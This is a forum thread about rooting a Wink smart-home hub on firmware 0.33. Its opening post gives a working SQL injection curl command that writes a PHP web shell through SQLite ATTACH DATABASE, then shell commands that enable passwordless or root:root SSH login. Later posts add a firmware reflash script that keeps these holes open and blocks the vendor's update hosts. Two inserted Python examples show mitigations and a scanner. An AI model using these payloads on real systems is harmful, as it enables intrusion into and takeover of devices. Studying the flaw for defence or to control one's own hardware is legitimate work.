Wink Hub root

FreeFly

Member
Feb 22, 2007
45
29
Rooting a Wink Hub with the latest (as of October) firmware (version 0.33) or earlier.

First use a curl command to exploit a SQL injection vulnerability to create a php file used to execute shell commands on the hub:
Code:
curl -d id="1 or 1=1';ATTACH DATABASE '/var/www/exploit.php' AS lol; CREATE TABLE lol.pwn (t TEXT); INSERT INTO lol.pwn (t) VALUES ('<?php passthru(' || char(36) || '_POST[' || char(39) || 'cmd' || char(39) || ']); ?>');--" http://192.168.0.1/dev_detail.php

Now you can supply shell commands to the exploit.php.

If you don't want to mess with ssh keys, now you can run this command to enable root login without using a password. My recommendation would be to immediately ssh in and use the passwd command to change the root password.

Code:
curl -d cmd='sed%20-i%20%27s%2F%3D-sg%2F%3D%2F%27%20%2Fetc%2Fdefault%2Fdropbear%3B%2Fetc%2Finit.d%2FS50dropbear%20restart%3Becho%20-e%20%22%5Cn%5Cn%22%20%7C%20passwd' http://192.168.0.1/exploit.php

For those who don't mind using ssh keys, or want to run other commands:

On the machine I want to copy my ssh key to root so I'd run something like this:
Code:
echo MySSH_PublicKey > /root/.ssh/authorized_keys

It would be nice if you could just call:
Code:
curl -d cmd='echo MySSH_PublicKey > /root/.ssh/authorized_keys'
But that won't generally work because of http issues. The key is to urlencode the cmd you want to run using a site like http://meyerweb.com/eric/tools/dencoder/
Just urlencode the bits between the single quotes, the php exploit won't work without the single quotes.

So after getting the urlencoded command I actually invoke:
Code:
curl -d cmd='echo%20MySSH_PublicKey%20%3E%20%2Froot%2F.ssh%2Fauthorized_keys' http://192.168.0.1/exploit.php

Then you can happily ssh as root to the wink hub!
:victory:
 
Last edited:
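
Added example, not part of the original post and not the hub's own code: a Python model of the SQLite behaviour the injection above relies on, showing two mitigations (a bound parameter, and an authorizer that refuses ATTACH). The `devices` table, the function names and the harmless marker row are assumptions made for the demonstration; the hub's real PHP source and schema are not on this page.

```python
import os
import sqlite3
import tempfile

def make_db(deny_attach=False):
    # Constructed stand-in table; the hub's real schema is not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE devices (id INTEGER PRIMARY KEY, name TEXT)")
    db.execute("INSERT INTO devices VALUES (1, 'lamp')")
    db.commit()
    if deny_attach:
        # The authorizer is consulted while each statement is compiled.
        db.set_authorizer(
            lambda action, *_: sqlite3.SQLITE_DENY
            if action == sqlite3.SQLITE_ATTACH else sqlite3.SQLITE_OK)
    return db

def lookup_concat(db, dev_id):
    # Vulnerable pattern: the value becomes SQL text, and a multi-statement
    # API (executescript here) runs everything after the ';'.
    db.executescript("SELECT name FROM devices WHERE id = " + dev_id)

def lookup_bound(db, dev_id):
    # Hardened: the value is bound as data and only one statement is compiled.
    return db.execute("SELECT name FROM devices WHERE id = ?", (dev_id,)).fetchall()

def run_case(mode):
    """Return (file_was_written, rows_or_status) for one handling mode."""
    target = os.path.join(tempfile.mkdtemp(), "dropped.txt")
    # Same statement shape as the first post, with a harmless marker as the row.
    value = ("1; ATTACH DATABASE '%s' AS lol; CREATE TABLE lol.pwn (t TEXT); "
             "INSERT INTO lol.pwn (t) VALUES ('constructed marker');" % target)
    db = make_db(deny_attach=(mode == "authorizer"))
    try:
        if mode == "bound":
            result = lookup_bound(db, value)
        else:
            lookup_concat(db, value)
            result = "executed"
    except sqlite3.DatabaseError as exc:
        result = "error: %s" % exc
    finally:
        db.close()
    return os.path.exists(target), result
```

`run_case("concat")` writes the file, while `"bound"` and `"authorizer"` leave the disk untouched; keeping the web root unwritable by the database process is a further layer this model does not cover.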

nyvram1

Senior Member
Apr 20, 2010
249
48
Then you can happily ssh as root to the wink hub!
:victory:

FIRST REPLY! :good:

This is awesome! I can't wait to see where this goes. We should also get Nashira in here with his awesome android app, BLINK that allows a rooted hub to be controlled locally.

https://github.com/nashira/blink

qnology

Member
Dec 10, 2014
7
0
Nice work. This will make things much easier.

Some people (people running Windows for instance) are having issues generating the ssh keys. As a suggestion, can we incorporate the below so that people can just login as root using a password? I believe this would make things even simpler.

Code:
#commands to allow root login using root as password
sed -i 's/=-sg/=/' /etc/default/dropbear;/etc/init.d/S50dropbear restart
echo -e 'root\nroot' | passwd

I don't have enough posts to provide the exact command, but it should be something like:
curl -d cmd='sed%20-i%20%27s%2F%3D-sg%2F%3D%2F%27%20%2Fetc%2Fdefault%2Fdropbear%3B%2Fetc%2Finit.d%2FS50dropbear%20restart' hxxp/ipaddress/exploit.php
curl -d cmd='echo%20-e%20%22root%5Cnroot%22%20%7C%20passwd' hxxp/ipaddress/exploit.php
 

berserko

Member
Dec 11, 2014
13
0
Rooting a Wink Hub with the latest (as of October) firmware (version 0.33) or earlier.

Very nice!

I started looking for another PHP hole but never looked that hard as my unit was already rooted. I did my upgrade by downloading the app-rootfs.ubi manually and using ubiformat to flash it on.

However, in the official Wink app it's still showing me version 0. I've been wading through the upgrade scripts to see where it sets version 33; it's in /database somewhere. If you could take a look at your device and let me know, I'd very much appreciate it.

I also have a pretty good script that downloads the update and re-exploits the update before it installs the update with ubiformat. There are about 4 or 5 places that have a lot of this wink rooting data. If there is interest I would be happy to set up a forum to focus the very small "scene".

If anyone has set up a Kidde smoke alarm via aprontest, let me know. I have had much luck as of yet. I'll certainly post if I make some headway.
 

Nabors

New member
Dec 11, 2014
1
0
Very nice!

I started looking for another PHP hole but never looked that hard as my unit was already rooted. I did my upgrade by downloading the app-rootfs.ubi manually and using ubiformat to flash it on.

However, in the official Wink app it's still showing me version 0. I've been wading through the upgrade scripts to see where it sets version 33; it's in /database somewhere. If you could take a look at your device and let me know, I'd very much appreciate it.

I also have a pretty good script that downloads the update and re-exploits the update before it installs the update with ubiformat. There are about 4 or 5 places that have a lot of this wink rooting data. If there is interest I would be happy to set up a forum to focus the very small "scene".

If anyone has set up a Kidde smoke alarm via aprontest, let me know. I have had much luck as of yet. I'll certainly post if I make some headway.
Here are the files that report the versions to the app.

echo "00.01" > /database/cf_build
echo "00.01" > /database/cf_fver2
echo "00.33" > /database/cf_fver3
 

automonkey

New member
Dec 11, 2014
2
0
There are about 4 or 5 places that have a lot of this wink rooting data. If there is interest I would be happy to set up a forum to focus the very small "scene".

Someone over at slickdeals did but doesn't look like there is anything happening over there yet. He's got some links but that is about it.

homeautomation proboards com/board/3/wink-hub

---------- Post added at 01:52 AM ---------- Previous post was at 01:16 AM ----------

Then you can happily ssh as root to the wink hub!
:victory:

It doesn't seem to be taking my key? I can't ssh into it.
disconnected: no supported authentication methods available (server sent publickey)?
 

qnology

Member
Dec 10, 2014
7
0
00.47 is out and this particular sql injection has been closed
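
Added example, not part of the thread: a file written with the ATTACH DATABASE technique from the first post is a SQLite database image that also contains a PHP open tag, which gives an auditor a cheap signature to scan a web root for. The function names and the sample directory contents are constructed for the demonstration.

```python
import os
import sqlite3
import tempfile

SQLITE_MAGIC = b"SQLite format 3\x00"   # first 16 bytes of every SQLite 3 file
PHP_OPEN_TAGS = (b"<?php", b"<?=")

def suspicious_files(web_root):
    """Return relative paths of SQLite images under web_root that embed a PHP tag."""
    hits = []
    for dirpath, _dirs, files in os.walk(web_root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    if fh.read(len(SQLITE_MAGIC)) != SQLITE_MAGIC:
                        continue
                    body = fh.read()
            except OSError:
                continue            # unreadable entry: skip, do not abort the scan
            if any(tag in body for tag in PHP_OPEN_TAGS):
                hits.append(os.path.relpath(path, web_root))
    return sorted(hits)

def _write_db(path, text):
    # Helper for the constructed sample: a one-row SQLite file at `path`.
    db = sqlite3.connect(path)
    db.execute("CREATE TABLE t (v TEXT)")
    db.execute("INSERT INTO t VALUES (?)", (text,))
    db.commit()
    db.close()

def build_sample_root():
    """Constructed web root: one normal script, one normal database, one hybrid."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'ok'; ?>\n")
    _write_db(os.path.join(root, "cache.db"), "plain row")
    _write_db(os.path.join(root, "odd.php"), "<?php /* constructed marker */ ?>")
    return root
```

Only the hybrid file is reported; the ordinary script lacks the SQLite header and the ordinary database lacks a PHP tag.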
 
Dec 11, 2014
10
0
FIRST REPLY! :good:

This is awesome! I can't wait to see where this goes. We should also get Nashira in here with his awesome android app, BLINK that allows a rooted hub to be controlled locally.

I'm also interested in Nashira's project, but I'm looking to use his work to figure out how to send commands from a Raspberry Pi that will be the equivalent of pushing a light-on button on the Android app. Being able to issue commands to the wink by running a python script, for example, would open up the hub to be used in conjunction with lots of home automation platforms. I have a bunch of cheap Arduino sensors integrated with an open source home automation system that is much more flexible than Wink, so I'd just like to use the Wink hub for its radios.

It looks like you can do a HTTP post to mimic a button push, but that's something I'm not familiar with. If someone has any insights, I'd appreciate it.

---------- Post added at 05:21 AM ---------- Previous post was at 05:13 AM ----------

BLINK does look very nice. I'd originally wanted to root the hubs just to run my own scripts for home automation, but that app is very cool.
:good:

Hey, that's what I'm interested in too. Do you think you can use his Android app to figure out how to send HTTP posts to the Wink hub?

00.47 is out and this particular sql injection has been closed

Qnology, when did that happen? Is it on the "wink-hub-images.s3.amazonaws.com/00.01/app-rootfs.ubi"? I just manually updated my rooted hub today with that .ubi file. Wonder if I upgraded to 0.33 or 0.47?? I don't even know how to find out.
 

FreeFly

Member
Feb 22, 2007
45
29
Do you think you can use his Android app to figure out how to send HTTP posts to the Wink hub?
Pretty easy. His API is https://github.com/nashira/blink/blob/master/server/api/commands/index.php It's really a wrapper for the aprontest command. Pretty easy to use python to send JSON messages to the commands/index.php. Play with aprontest by itself for a bit first and you'll understand how to use it to switch and dim the lights:
http://gtvhacker.com/index.php/Wink_Hub

Then you'll understand you just send a command (update) with the master id for the light you want to switch, and value id (1 for dim, 2 for on/off), and a corresponding value (1-255 for dim / ON or OFF) wrap it in JSON and send to command/index.php
;)


I'm going to write some code to do this myself so I'll post some samples here when I do.
 

qnology

Member
Dec 10, 2014
7
0
Qnology, when did that happen? Is it on the "wink-hub-images.s3.amazonaws.com/00.01/app-rootfs.ubi"? I just manually updated my rooted hub today with that .ubi file. Wonder if I upgraded to 0.33 or 0.47?? I don't even know how to find out.

I guess yesterday. I upgraded a new out of box Wink Hub using the iOS Wink App thinking that I would get 00.33. When I ran the curl command against dev_detail.php and received a 404, I checked my iOS Wink app and it showed that the Hub was on firmware 00.47.
 

berserko

Member
Dec 11, 2014
13
0
Qnology, when did that happen? Is it on the "wink-hub-images.s3.amazonaws.com/00.01/app-rootfs.ubi"? I just manually updated my rooted hub today with that .ubi file. Wonder if I upgraded to 0.33 or 0.47?? I don't even know how to find out.

Run an MD5sum against your app-rootfs.ubi. If the md5sum is 55574706f2cbf4f6e17e4d224b63287d then you have version 47. I don't have the 33 md5sum in front of me; I'll post it if I can find it...

---------- Post added at 02:38 PM ---------- Previous post was at 02:20 PM ----------

Run an MD5sum against your app-rootfs.ubi if the md5sum is 55574706f2cbf4f6e17e4d224b63287d then you have version 47. The MD5sum for 33 is eec07feee1fa1a4a06e05a00af18156f

I found the update went live at:

2014-12-10T22:16:58.000Z

I assume Z means zulu so 5:16pm eastern?
 

berserko

Member
Dec 11, 2014
13
0
Here are the commands I used to upgrade my pre-rooted Wink from 33 to 47

Hope this helps:
Code:
echo "1" > /database/DO_UPDATE
reboot

Once it comes back in upgrade mode I ran the following:
Code:
cd /tmp
echo "127.0.0.1       localhost" > /etc/hosts
echo "127.0.0.1       flex-dvt" >> /etc/hosts
wget hXXp://wink-hub-images.s3.amazonaws.com/00.01/app-rootfs.ubi  # fix the URL scheme (hXXp); the forum is breaking it on me
ubiformat /dev/mtd5 -f /tmp/app-rootfs.ubi
ubiattach -p /dev/mtd5
mkdir /tmp/updater
mount -t ubifs ubi2:rootfs /tmp/updater
sed -i 's/=-sg/=/' /tmp/updater/etc/default/dropbear
rm -f /tmp/updater/etc/init.d/S99local
cp /var/www/set_dev_value.php /tmp/updater/var/www
fw_setenv bootdelay 5
sed -i 's/bootdelay       0/bootdelay       5/' /database_default/u-boot.env
cp /etc/shadow /tmp/updater/etc
mkdir /tmp/updater/root/.ssh
cp /root/.ssh/authorized_keys /tmp/updater/root/.ssh/authorized_keys
echo "127.0.0.1       hub-api.winkapp.com"  >> /tmp/updater/etc/hosts
echo "127.0.0.1       hub-updates.winkapp.com" >> /tmp/updater/etc/hosts
echo "127.0.0.1       wink-hub-images.s3.amazonaws.com" >> /tmp/updater/etc/hosts
sed -i 's/rm \/database\/wpa_supplicant.conf/echo WPA Fix #rm \/database\/wpa_supplicant.conf/' /tmp/updater/etc/init.d/S31platform
sed -i 's/#ttyAM0/ttyAM0/' /tmp/updater/etc/inittab
echo "00.01" > /database/cf_build
echo "00.01" > /database/cf_fver2
echo "00.47" > /database/cf_fver3
echo "127.0.0.1       hub-api.winkapp.com"  >> /etc/hosts
echo "127.0.0.1       hub-updates.winkapp.com" >> /etc/hosts
echo "127.0.0.1       wink-hub-images.s3.amazonaws.com" >> /etc/hosts
echo "0" > /database/DO_UPDATE
reboot

Once the reboot completes the device will come back online as version 47. This worked fine for me, but as always YMMV. The script creates enough holes you should be able to get back in one way or another...
 

qnology

Member
Dec 10, 2014
7
0
Starting from a new in box Wink Hub, is there anything I need to do beforehand to make sure I can SSH into the "upgrade mode" partition? It's not clear if people are using a Serial Console connection to access the "upgrade mode" partition or if they are SSHing in. For SSH access, I would assume the authorized_keys file needs to be updated (so the upgrade mode partition would need to be mounted and updated). Just need some confirmation. Thank you


Here are the commands I used to upgrade my pre-rooted Wink from 33 to 47

Hope this helps:
Code:
echo "1" > /database/DO_UPDATE
reboot
 
Dec 11, 2014
10
0
Run an MD5sum against your app-rootfs.ubi. If the md5sum is 55574706f2cbf4f6e17e4d224b63287d then you have version 47. I don't have the 33 md5sum in front of me; I'll post it if I can find it...


I ran an MD5sum on the copy of app-rootfs.ubi that I downloaded from the Amazon AWS link sometime on Dec 10th. It is "eec07feee1fa1a4a06e05a00af18156f".

I have no idea if it's v0.33 or 0.47. If someone else has a file they're sure is 0.33, can they run a MD5sum on it?
 

jpkboca

Member
Oct 4, 2010
11
1
If I rooted and never updated, so I have original firmware, can I use the method you described to go straight to 47?

Thanks
Jeff


Starting from a new in box Wink Hub, is there anything I need to do beforehand to make sure I can SSH into the "upgrade mode" partition? It's not clear if people are using a Serial Console connection to access the "upgrade mode" partition or if they are SSHing in. For SSH access, I would assume the authorized_keys file needs to be updated (so the upgrade mode partition would need to be mounted and updated). Just need some confirmation. Thank you
 

Top Liked Posts

  • Only set bootdelay with active UART connection

    After unplugging the UART and assembling the Hub I found out that with bootdelay set to non-zero it will not boot (solid green light) unless there is a UART connection present. You probably want to set this back to zero when you are done rooting.